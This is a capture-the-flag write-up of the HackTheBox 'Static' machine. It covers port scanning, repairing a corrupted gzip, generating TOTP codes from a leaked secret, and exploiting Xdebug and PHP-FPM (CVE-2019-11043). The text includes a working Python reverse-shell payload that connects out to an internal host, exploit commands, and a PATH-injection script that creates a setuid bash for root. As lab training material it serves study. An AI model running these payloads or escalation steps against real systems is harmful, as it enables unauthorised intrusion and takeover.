
HackTheBox: Static


User

Started by running nmap to enumerate open ports:

22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
|   256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
|_  256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
2222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
|   256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_  256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Got a lot of information from nmap:

  • It may be running some kind of container because there are two ssh ports open with different OS versions.
  • There are some interesting directories listed in robots.txt.

Let’s check what’s inside the ftp folder:

FTP uploads

Inside warning.txt there is a small message:

Binary files are being corrupted during transfer!!! Check if are recoverable.

So it’s giving us a small hint that the file is corrupted. Downloaded the gz file and tried to decompress it, and as expected it returns an error:

tar xvzf db.sql.gz 

gzip: stdin: invalid compressed data--crc error

gzip: stdin: invalid compressed data--length error
tar: Child returned status 1
tar: Error is not recoverable: exiting now

Searching for information, it seems that the file was downloaded from the ftp using ASCII mode instead of binary mode (which rewrites line endings inside the compressed stream). This post explains how to recover it:

./fixgz db.sql.gz db.sql

It can also be recovered with gzrecover
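What fixgz does, as an added example that is not part of the original post: simulate the ASCII-mode transfer on a constructed gzip file (every LF becomes CRLF), reproduce the crc/length errors seen above, then strip the inserted CRs and validate the result by decompressing it. The sample SQL dump and the helper names are constructed for this example.

```python
import gzip
import zlib


def ascii_mode_corrupt(blob: bytes) -> bytes:
    """Simulate an FTP ASCII-mode transfer: every LF (0x0A) in the binary
    gzip stream becomes CRLF (0x0D 0x0A). This breaks the DEFLATE data and
    shifts the trailing CRC32/ISIZE fields, which is what gzip reports as
    'crc error' and 'length error'."""
    return blob.replace(b"\n", b"\r\n")


def fixgz(blob: bytes) -> bytes:
    """Undo the conversion the same way gzip.org's fixgz does: drop the CR
    that precedes every LF. Caveat: this is ambiguous if the original stream
    already contained CRLF, so the output must be validated afterwards."""
    return blob.replace(b"\r\n", b"\n")


def try_decompress(blob: bytes):
    """Return (ok, data_or_error). gzip.decompress checks the DEFLATE stream
    and the CRC32/ISIZE trailer, so a repaired file is trusted only if this
    succeeds."""
    try:
        return True, gzip.decompress(blob)
    except (OSError, EOFError, zlib.error) as exc:   # OSError covers BadGzipFile
        return False, str(exc)


def make_sample():
    """Constructed sample: a small SQL dump, gzipped. The counter is bumped
    until the compressed bytes contain an LF but no CRLF, so the corruption
    is visible and the repair is unambiguous (like db.sql.gz on the box)."""
    for n in range(10000):
        sql = (b"CREATE DATABASE static;\nUSE static;\n"
               b"INSERT INTO users VALUES (%d, 'admin');\n" % n)
        blob = gzip.compress(sql, mtime=0)
        if b"\n" in blob and b"\r\n" not in blob:
            return sql, blob
    raise RuntimeError("no suitable sample found")


if __name__ == "__main__":
    sql, good = make_sample()
    bad = ascii_mode_corrupt(good)
    print("corrupted:", try_decompress(bad))
    print("repaired :", try_decompress(fixgz(bad)) == (True, sql))
```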

The recovered file seems to have some sort of unfinished sql file:

CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsignint  a'n a)Co3 Nto_increment,sers name varchar(20) a'n a)Co, password varchar(40) a'n a)Co, totp varchar(16) a'n a)Co, primary key (idS iaA; 
INSERT INTOrs ( id smaers name vpassword vtotp vaS iayALUESsma, prim'admin'im'd05nade22ae348aeb5660fc2140aec35850c4da997m'd0orxxi4c7orxwwzlo'
IN

At this point I tried to recover the password; it was 40 characters long so it may be SHA-1, but didn’t manage to crack it. Went to /vpn, which redirects us to a login form, and we can easily log in using admin:admin. Then it asks for a 2FA code, so we have to use the totp secret from the sql file to generate it.

It won’t work unless we are synchronised with the server’s time. We can use nmap to check the time difference:

nmap -Pn -sV --script=http-date -p 8080 static.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-05 23:04 CEST
Nmap scan report for static.htb (10.10.10.246)
Host is up (0.048s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-date: Mon, 05 Jul 2021 21:17:18 GMT; +12m36s from local time.
|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

So let’s synchronize using curl, following this post:

date -s "$(date -d "$(curl -sI http://static.htb:8080| grep -i '^date:'|cut -d' ' -f2-)" | xargs -I {} date --date='{}' "+%Y-%m-%d %H:%M:%S")"

Since the key must be 16 characters long and the one in the sql dump is 18, removed the d0 at the start because it seems like noise (it was also on the password field). Then used oathtool to generate the codes:

oathtool -b --totp 'orxxi4c7orxwwzlo'
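What oathtool computes above, as an added example that is not part of the original post: RFC 6238 TOTP (HMAC-SHA1, 30 s step, 6 digits) with a `skew` parameter, so a known server offset such as the +12m36s (756 s) nmap reported can be compensated without resetting the local clock, plus the server-side window check that explains why that much drift is rejected. The secret used below is the RFC 6238 test vector, not the one from the box.

```python
import base64
import hashlib
import hmac
import struct
import time

# Constructed for this example: the RFC 4226/6238 test secret, base32-encoded.
RFC_TEST_SECRET = base64.b32encode(b"12345678901234567890").decode()


def totp(secret_b32: str, at_time=None, skew: int = 0,
         step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP with oathtool's defaults (HMAC-SHA1, 30 s, 6 digits).
    `skew` is added to local time to match the server clock (e.g. 756 s)."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    now = time.time() if at_time is None else at_time
    counter = int((now + skew) // step)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def verify(secret_b32: str, candidate: str, at_time=None,
           window: int = 1, step: int = 30) -> bool:
    """Typical server-side check: accept codes from `window` adjacent steps.
    A few seconds of drift is tolerated; 12 minutes (25 steps) is not."""
    now = time.time() if at_time is None else at_time
    return any(hmac.compare_digest(totp(secret_b32, now + i * step), candidate)
               for i in range(-window, window + 1))


if __name__ == "__main__":
    print("local clock :", totp(RFC_TEST_SECRET))
    print("server clock:", totp(RFC_TEST_SECRET, skew=756))
```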

Here is the internal portal:

Internal portal

So it shows IPs of hosts that should be available, and we can generate a vpn config file too. However we can’t just start both vpn clients at the same time, so did the following (inspired by this answer):

sudo openvpn --route-nopull --config ./vpn/static.ovpn

We can verify our network configuration:

ifconfig
...

tun9: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 172.30.0.11  netmask 255.255.0.0  destination 172.30.0.11
        inet6 fe80::ddf9:1ad1:b077:82be  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3  bytes 448 (448.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

On another terminal create static routes to tunnel the traffic of that network:

sudo route add -net 172.20.0.0 netmask 255.255.0.0 gw 172.30.0.1 tun9
sudo route add -net 10.10.14.0 netmask 255.255.254.0 gw 10.10.14.1 tun0

Enumerated ports on the database just in case:

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
|   Thread ID: 35
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolOld, SupportsTransactions, Support41Auth, IgnoreSigpipes, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase, DontAllowDatabaseTableColumn, InteractiveClient, ODBCClient, IgnoreSpaceBeforeParenthesis, LongColumnFlag, FoundRows, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: n*%wN]j{MO"\)WZ=bWj3
|_  Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:canonical:ubuntu_linux:18.04

It seems vulnerable to CVE-2016-6663, but we don’t have credentials, so it isn’t useful, at least for the moment.

Here is the scan on the web server:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
|   256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_  256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 19    2020-04-03 15:18  info.php
| -     2020-03-26 09:40  vpn/
|_
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Index of /
Service Info: Host: 172.20.0.10; OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is phpinfo in /info.php and after checking it out found xdebug 2.6.0 enabled:

Xdebug

Used this POC to exploit it and get the user flag:

./xdebug-shell.py -l 172.30.0.10 -u http://172.20.0.10/info.php
>> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Afterwards grabbed the ssh id_rsa (the exploit has a limited number of rows, so read it 6 rows at a time):


When I tried to connect using the key with -vvv, it shows an error:

ssh -i id_rsa www-data@172.20.0.10 -vvv
...
        expecting SSH2_MSG_KEX_ECDH_REPLY

So after some help it seems that we need to specify the MAC algorithm as follows:

ssh -o MACs=hmac-sha2-256 -i id_rsa www-data@172.20.0.10

Root

Here is the network configuration:

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.0.10  netmask 255.255.255.0  broadcast 172.20.0.255
        ether 02:42:ac:14:00:0a  txqueuelen 0  (Ethernet)
        RX packets 3177  bytes 1893058 (1.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2601  bytes 1789532 (1.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.254.2  netmask 255.255.255.0  broadcast 192.168.254.255
        ether 02:42:c0:a8:fe:02  txqueuelen 0  (Ethernet)
        RX packets 4418  bytes 1880772 (1.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 6354  bytes 2552579 (2.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Now we can try to access the pki host. Let’s scan its ports; to do so we only have wget available:

for i in {1..65535}; do wget -qS -O-  192.168.254.3:$i; done
  HTTP/1.1 200 OK
  Server: nginx/1.14.0 (Ubuntu)
  Date: Thu, 01 Jul 2021 02:12:11 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP-FPM/7.1
batch mode: /usr/bin/ersatool create|print|revoke CN

It has only port 80 open, and it seems to be using PHP-FPM/7.1. Searching for exploits for that version, found this POC for CVE-2019-11043 and transferred all the files using ssh:

scp -r -P 2222 -i id_rsa ./exploit/  www-data@static.htb:/tmp/exploit/

Then we execute the exploit:

python3 exploit.py --url http://192.168.254.3/index.php
[*] QSL candidate: 1754, 1759, 1764
[*] Target seems vulnerable (QSL:1754/HVL:220): PHPSESSID=90a02f428a3d6948112aaed46b2858a3; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://192.168.254.3/index.php?a=bin/ls+/

Then created a reverse shell with a python script, after using which to determine the available programs:

import requests

# The exploited index.php runs the value of the "a" parameter as a command,
# so send a python3 reverse shell that connects back to the web host (192.168.254.2:7777).
payload = '/usr/bin/python3.6 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
params = {"a": payload}
r = requests.get("http://192.168.254.3/index.php", params=params)

We check for files with capabilities on the filesystem and find the tool mentioned before:

getcap -r / 2>/dev/null
/usr/bin/ersatool = cap_setuid+eip

Used pspy to check what is running under the hood:

pspy

It’s using openssl with a relative path, so we can exploit it by using PATH Injection to get root:

echo -e '#!/bin/bash\ncp /bin/bash /tmp\nchmod 777 /tmp/bash\nchmod u+s /tmp/bash' > /tmp/openssl
export PATH="/tmp:$PATH"

Finally we can execute ersatool create to create a zone; afterwards there is a setuid bash in /tmp that we can use to get root with /tmp/bash -p.


Written by ITasahobby (InTernet lover)